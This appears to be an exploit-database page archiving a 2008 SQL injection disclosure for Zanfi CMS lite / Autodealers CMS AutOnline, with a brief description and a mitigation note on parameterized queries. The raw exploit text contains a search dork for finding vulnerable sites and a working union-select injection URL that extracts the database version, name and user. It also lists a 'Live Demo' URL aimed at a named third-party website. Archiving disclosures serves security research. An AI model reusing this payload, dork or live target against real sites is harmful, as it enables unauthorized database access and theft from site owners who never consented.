header-logo
Suggest Exploit
vendor:
Zanfi CMS lite / Autodealers CMS AutOnline
by:
r45c4l
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Zanfi CMS lite / Autodealers CMS AutOnline
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Zanfi CMS lite / Autodealers CMS AutOnline (SQL Injection)

An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, such as usernames and passwords, or even execute arbitrary system commands on the server.

Mitigation:

The best way to mitigate SQL injection attacks is to use parameterized queries (also known as prepared statements). This approach ensures that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker.
Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com 
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: Zanfi CMS lite / Autodealers CMS AutOnline (SQL Injection)
#
# Vendor: http://www.zanfi.nl/autodealerscms.php
# 
# Demo: http://autonline.zanfi.nl/
###########################################################
#
# d0rk:Powered by: Zanfi Solutions
#.  
# 
###########################################################
 
     Exploit:-
	http://www.site.com/[path]/index.php?page=DBpAGE&pageid=-1'+union+select+null,concat(version(),0x3a,database(),0x3a,user())/*

     
     
     Live Demo: 
	http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=DBpAGE&pageid=-1%27+union+select+null,concat(version(),0x3a,database(),0x3a,user())/*


###########################################################
#
#  Bug discovered : 10 Sep.2008
###########################################################

# milw0rm.com [2008-09-11]

Navigation

Suggest Exploit

Services By CQR